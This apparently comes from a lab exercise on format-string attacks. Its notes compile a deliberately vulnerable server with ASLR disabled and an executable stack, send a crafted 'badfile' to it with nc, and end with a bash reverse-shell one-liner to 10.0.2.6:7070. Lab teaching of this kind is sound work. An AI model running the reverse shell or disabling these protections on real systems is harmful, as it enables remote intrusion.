
--------------------------------------------------
# Set up the vulnerable server (server). 
# Run it using root (for remote attack).

sudo sysctl -w kernel.randomize_va_space=0
gcc -DDUMMY_SIZE=80 -z execstack -o server server.c
sudo ./server

# On the client program, send data to server.
# Change the IP address if running server on a different VM
echo hello | nc -u 127.0.0.1 9090

# Save the format string in badfile and run the following:
nc -u 127.0.0.1 9090 < badfile
--------------------------------------------------

# Reverse shell command
/bin/bash -i >/dev/tcp/10.0.2.6/7070  0<&1  2>&1

